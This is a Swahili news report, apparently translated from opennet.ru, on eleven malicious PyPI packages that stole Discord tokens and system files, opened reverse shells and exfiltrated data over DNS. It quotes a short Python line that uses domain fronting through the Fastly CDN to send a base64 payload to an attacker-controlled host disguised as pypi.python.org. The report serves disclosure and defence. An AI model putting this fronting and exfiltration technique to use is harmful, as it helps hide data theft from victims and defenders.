Katika saraka ya PyPI (Python Package Index), vifurushi 11 vyenye msimbo mbaya vilitambuliwa. Kabla ya matatizo kutambuliwa, vifurushi vilikuwa vimepakuliwa takriban mara elfu 38 kwa jumla. Vifurushi hasidi vilivyotambuliwa vinajulikana kwa matumizi yao ya mbinu za kisasa kuficha njia za mawasiliano na seva za washambuliaji.
- keypackage (vipakuliwa 6305), kifurushi muhimu (12897) - ilianzisha muunganisho kwa seva ya nje chini ya kivuli cha kuunganisha kwa pypi.python.org ili kutoa ufikiaji wa ganda kwa mfumo (reverse shell) na kutumia programu ya trevorc2 kuficha njia ya mawasiliano.
- pptest (10001), ipboards (946) - ilitumia DNS kama njia ya mawasiliano kusambaza habari juu ya mfumo (kwenye pakiti ya kwanza jina la mwenyeji, saraka ya kufanya kazi, IP ya ndani na nje, kwa pili - jina la mtumiaji na jina la mwenyeji) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - alitambua tokeni ya huduma ya Discord katika mfumo na kuituma kwa mwenyeji wa nje.
- trrfab (287) - ilituma kitambulisho, jina la mwenyeji na yaliyomo ya /etc/passwd, /etc/hosts, /home kwa mwenyeji wa nje.
- 10Cent10 (490) - ilianzisha muunganisho wa ganda la nyuma na mwenyeji wa nje.
- yandex-yt (4183) - ilionyesha ujumbe kuhusu mfumo kuathiriwa na kuelekezwa kwenye ukurasa wenye maelezo ya ziada kuhusu hatua zaidi zinazotolewa kupitia nda.ya.ru (api.ya.cc).
Ya kukumbukwa hasa ni mbinu ya kufikia seva pangishi za nje zinazotumiwa katika kifurushi muhimu na vifurushi muhimu, ambavyo vilitumia mtandao wa uwasilishaji wa yaliyomo haraka uliotumiwa katika saraka ya PyPI kuficha shughuli zao. Kwa kweli, maombi yalitumwa kwa seva ya pypi.python.org (pamoja na kubainisha jina python.org katika SNI ndani ya ombi la HTTPS), lakini kichwa cha HTTP "Host" kilijumuisha jina la seva inayodhibitiwa na washambuliaji (sec. forward.io. global.prod.fastly.net). Mtandao wa uwasilishaji maudhui ulituma ombi sawa kwa seva inayoshambulia, kwa kutumia vigezo vya muunganisho wa TLS kwa pypi.python.org wakati wa kutuma data.
Miundombinu ya PyPI inaendeshwa na mtandao wa uwasilishaji wa maudhui ya Fastly, ambao hutumia seva mbadala ya uwazi ya Varnish kuweka akiba ya maombi ya kawaida, na pia hutumia uchakataji wa cheti cha TLS katika kiwango cha CDN, badala ya seva za mwisho, kusambaza maombi ya HTTPS kupitia seva mbadala. Bila kujali seva pangishi inayolengwa, maombi hutumwa kwa seva mbadala, ambayo huamua seva pangishi inayotakikana kwa kutumia kichwa cha HTTP "Mpangishi", na majina ya vikoa vya seva pangishi yameunganishwa kwenye anwani za IP za kusawazisha za CDN ambazo ni za kawaida kwa wateja wote wa Fastly.
Seva ya washambuliaji pia hujiandikisha na CDN Fastly, ambayo hutoa mipango ya bure kwa kila mtu na hata inaruhusu usajili usiojulikana. Ni vyema kutambua kwamba kutuma maombi kwa mhasiriwa wakati wa kuunda "ganda la nyuma", mpango pia hutumiwa, lakini ulianzishwa kutoka upande wa mwenyeji wa mshambuliaji. Kwa nje, mwingiliano na seva ya washambuliaji inaonekana kama kipindi halali na saraka ya PyPI, iliyosimbwa kwa njia fiche kwa kutumia cheti cha PyPI TLS. Mbinu kama hiyo, inayojulikana kama "utangulizi wa kikoa," ilitumika hapo awali kuficha jina la mwenyeji wakati wa kukwepa kuzuia, kwa kutumia uwezo uliotolewa katika baadhi ya mitandao ya CDN kufikia HTTPS kwa kuonyesha mwenyeji potofu katika SNI na kwa kweli kusambaza jina la aliomba mpangishi katika kichwa cha Seva HTTP ndani ya kipindi cha TLS.
Ili kuficha shughuli hasidi, kifurushi cha TrevorC2 kilitumiwa pia kufanya mwingiliano na seva sawa na urambazaji wa kawaida wa wavuti, kwa mfano, maombi hasidi yalitumwa kwa kisingizio cha kupakua picha "https://pypi.python.org/images/ guid=β na usimbaji wa habari katika kigezo cha mwongozo. url = "https://pypi.python.org" + "/picha" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Vifurushi vya pptest na ipboards vilitumia mbinu tofauti kuficha shughuli za mtandao, kulingana na kusimba taarifa muhimu katika maswali kwa seva ya DNS. Programu hasidi hutuma maelezo kwa kutekeleza maombi ya DNS kama vile βnu4timjagq4fimbuhe.example.comβ, ambapo data inayotumwa kwa seva ya udhibiti husimbwa kwa kutumia umbizo la base64 katika jina la kikoa kidogo. Mshambulizi hupokea ujumbe huu kwa kudhibiti seva ya DNS kwa kikoa cha example.com.
Chanzo: opennet.ru